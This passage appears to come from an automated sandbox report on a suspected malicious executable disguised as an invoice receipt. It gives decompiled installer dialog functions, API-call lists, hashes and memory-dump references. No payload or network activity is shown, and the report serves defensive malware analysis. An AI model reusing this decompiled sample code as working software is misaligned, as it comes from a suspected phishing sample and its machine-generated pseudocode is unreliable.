0x004050fa
0x00405106
0x00405106
0x00000000

APIs

GetDlgItem.USER32 ref: 00404FC0
GetDlgItem.USER32 ref: 00404FCF
GetClientRect.USER32 ref: 0040500C
GetSystemMetrics.USER32 ref: 00405014
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
ShowWindow.USER32(?,00000008), ref: 004050B0
GetDlgItem.USER32 ref: 004050D1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
GetDlgItem.USER32 ref: 00404FDE

Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A

GetDlgItem.USER32 ref: 00405123
CreateThread.KERNEL32 ref: 00405131
CloseHandle.KERNEL32(00000000), ref: 00405138
ShowWindow.USER32(00000000), ref: 0040515C
ShowWindow.USER32(?,00000008), ref: 00405161
ShowWindow.USER32(00000008), ref: 004051A8
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
CreatePopupMenu.USER32 ref: 004051EB
AppendMenuA.USER32 ref: 00405200
GetWindowRect.USER32 ref: 00405213
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
OpenClipboard.USER32(00000000), ref: 00405282
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
GlobalLock.KERNEL32 ref: 0040529B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
SetClipboardData.USER32 ref: 004052D2
CloseClipboard.USER32 ref: 004052D8

Strings

{, xrefs: 004051C7

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420474;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42048c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420474 = _t315;
								 *0x42048c = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42048c;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42048c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404790
0x00404796
0x00404798
0x0040479e
0x004047a4
0x004047b1
0x004047ba
0x004047bd
0x004047c0
0x004049e8
0x004049ef
0x00404a03
0x004049f1
0x004049f3
0x004049f6
0x004049f7
0x004049fe
0x004049fe
0x00404a0f
0x00404a1d
0x00404a20
0x00404a36
0x00404aae
0x00404ab1
0x00404ab3
0x00404abd
0x00404acb
0x00404acb
0x00404acd
0x00404ad7
0x00404add
0x00404afe
0x00404adf
0x00404aec
0x00404aec
0x00404add
0x00404ad7
0x00000000
0x00404ab1
0x00404a3b
0x00404a46
0x00404a4b
0x00404a52
0x00404a59
0x00404a63
0x00404a63
0x00404a67
0x00404a6c
0x00404a71
0x00404a87
0x00404a73
0x00404a73
0x00404a7b
0x00404a82
0x00404a7d
0x00404a7d
0x00404a7d
0x00404a7b
0x00404a8b
0x00404a8d
0x00404a9b
0x00404a9c
0x00404aa8
0x00404aab
0x00404aab
0x00404a6c
0x00000000
0x00404a59
0x00404a3d
0x00404a44
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b01
0x00404b01
0x00404b08
0x00404b7c
0x00404b83
0x00404b8f
0x00404b8f
0x00404b98
0x00404b9a
0x00404ba1
0x00404ba4
0x00404ba4
0x00404baa
0x00404bb1
0x00404bb4
0x00404bb4
0x00404bba
0x00404bc0
0x00404bc6
0x00404bc6
0x00404bd3
0x00404d20
0x00404d27
0x00404d44
0x00404d4a
0x00404d5c
0x00404d5c
0x00000000
0x00404bd9
0x00404bdb
0x00404be3
0x00404be7
0x00404be7
0x00404bef
0x00404c30
0x00404c32
0x00404c42
0x00404c45
0x00404c4a
0x00404c51
0x00404c54
0x00404cf6
0x00404cfc
0x00404d0a
0x00404d1b
0x00404d1b
0x00000000
0x00404d0a
0x00404c5a
0x00404c5d
0x00404c63
0x00404c68
0x00404c6a
0x00404c6c
0x00404c72
0x00404c79
0x00404c7e
0x00404c85
0x00404c88
0x00404c88
0x00404c8f
0x00404c9b
0x00404c9f
0x00404ca1
0x00404ca1
0x00404c91
0x00404c93
0x00404c93
0x00404cc1
0x00404ccd
0x00404cdc
0x00404cdc
0x00404cde
0x00404ce1
0x00404cea
0x00000000
0x00404bf1
0x00404bfc
0x00404bff
0x00404c04
0x00404c06
0x00404c0a
0x00404c1a
0x00404c24
0x00404c26
0x00404c29
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c0c
0x00404c0c
0x00404c12
0x00404c14
0x00404c14
0x00404c15
0x00404c16
0x00000000
0x00404c0c
0x00404bef
0x00404bd3
0x00404b10
0x00000000
0x00404b26
0x00404b30
0x00404b35
0x00000000
0x00000000
0x00404b47
0x00404b4c
0x00404b58
0x00404b58
0x00404b5a
0x00404b69
0x00404b6b
0x00404b72
0x00404b75
0x00000000
0x00404b75
0x00404b10
0x004047c6
0x004047cb
0x004047d5
0x004047d6
0x004047df
0x004047ea
0x004047f5
0x004047fb
0x00404809
0x0040481e
0x00404823
0x0040482e
0x00404837
0x0040484c
0x0040485d
0x0040486a
0x0040486a
0x0040486f
0x00404875
0x00404877
0x0040487a
0x0040487f
0x00404884
0x00404886
0x00404886
0x004048a6
0x004048a6
0x004048a8
0x004048a9
0x004048ae
0x004048b1
0x004048b4
0x004048b8
0x004048bd
0x004048c2
0x004048c6
0x004048cb
0x004048d0
0x004048d2
0x004048da
0x004049a4
0x004049b7
0x00000000
0x004048e0
0x004048e3
0x004048e6
0x004048e9
0x004048e9
0x004048ef
0x004048f5
0x004048f8
0x004048fe
0x004048ff
0x00404904
0x0040490d
0x00404914
0x00404917
0x0040491a
0x0040491d
0x00404959
0x00404982
0x0040495b
0x00404968
0x00404968
0x0040491f
0x00404922
0x00404931
0x0040493b
0x00404943
0x0040494a
0x00404952
0x00404952
0x0040491d
0x00404988
0x00404989
0x00404995
0x00404995
0x004049a2
0x004049bd
0x004049c1
0x004049de
0x004049e3
0x004049e6
0x00000000
0x004049c3
0x004049c8
0x004049d1
0x00404d5e
0x00404d70
0x00404d70
0x004049c1
0x00000000
0x004049a2
0x004048da

APIs

GetDlgItem.USER32 ref: 00404789
GetDlgItem.USER32 ref: 00404796
GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
LoadBitmapA.USER32 ref: 004047F5
SetWindowLongA.USER32(?,000000FC,00404D73), ref: 0040480F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
DeleteObject.GDI32(?), ref: 0040486F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
GetWindowLongA.USER32 ref: 004049A9
SetWindowLongA.USER32(?,000000F0,00000000), ref: 004049B7
ShowWindow.USER32(?,00000005), ref: 004049C8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
ImageList_Destroy.COMCTL32(?), ref: 00404BA4
GlobalFree.KERNEL32 ref: 00404BB4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
ShowWindow.USER32(?,00000000), ref: 00404D4A
GetDlgItem.USER32 ref: 00404D55
ShowWindow.USER32(00000000), ref: 00404D5C

Strings

N, xrefs: 00404A06
, xrefs: 00404D34
M, xrefs: 00404922

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404275, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x0040427b
0x00404282
0x0040428e
0x0040429c
0x004042a4
0x004042a8
0x004042ae
0x004042ae
0x004042ba
0x0040432e
0x00404335
0x0040440a
0x00404411
0x00404420
0x00404420
0x00404424
0x0040442a
0x00404437
0x00404439
0x00404439
0x00404447
0x0040444c
0x0040444f
0x00404456
0x00404459
0x00404490
0x00404492
0x00404498
0x0040449f
0x004044a1
0x004044a1
0x004044bd
0x004044f9
0x00000000
0x004044bf
0x004044c2
0x004044d6
0x004044d8
0x00000000
0x004044d8
0x0040445b
0x0040445f
0x0040448e
0x0040448e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404461
0x00404461
0x0040446e
0x00404473
0x00000000
0x00000000
0x00404477
0x00404479
0x00404479
0x00404484
0x00404487
0x0040448c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040448c
0x004044e7
0x004044ee
0x004044f5
0x004044fc
0x004044fc
0x00404501
0x00404503
0x0040450b
0x00404511
0x00404511
0x00404521
0x0040452b
0x00404533
0x00404549
0x00404535
0x00404539
0x00404539
0x00404533
0x0040454e
0x00404553
0x00404558
0x00404561
0x00404561
0x0040456a
0x0040456c
0x0040456c
0x00404578
0x00404580
0x0040458a
0x0040458a
0x0040458f
0x00000000
0x0040458f
0x00404459
0x00404413
0x0040441a
0x00000000
0x00000000
0x00000000
0x0040441a
0x0040433b
0x00404341
0x0040435b
0x00404360
0x0040436a
0x00404371
0x00404380
0x00404383
0x00404386
0x0040438d
0x00404395
0x00404398
0x0040439c
0x004043a3
0x004043ab
0x00404403
0x004043ad
0x004043ae
0x004043b5
0x004043bf
0x004043c7
0x004043d4
0x004043e8
0x004043ec
0x004043ec
0x004043e8
0x004043f1
0x004043fc
0x004043fc
0x004043ab
0x00000000
0x00404360
0x0040434e
0x00000000
0x00000000
0x00404354
0x00000000
0x004042bc
0x004042bc
0x004042c8
0x004042d2
0x004042df
0x004042df
0x004042e5
0x004042ee
0x004042f7
0x004042fa
0x004042fd
0x00404305
0x00404308
0x0040430b
0x00404313
0x0040431a
0x00404321
0x00404595
0x004045a7
0x004045a7
0x0040432c
0x00000000
0x0040432c

APIs

GetDlgItem.USER32 ref: 004042C1
SetWindowTextA.USER32(?,?), ref: 004042EE
SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
CoTaskMemFree.OLE32(00000000), ref: 004043AE
lstrcmpiA.KERNEL32(pzusn,00420498,00000000,?,?), ref: 004043E0
lstrcatA.KERNEL32(?,pzusn), ref: 004043EC
SetDlgItemTextA.USER32 ref: 004043FC

Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
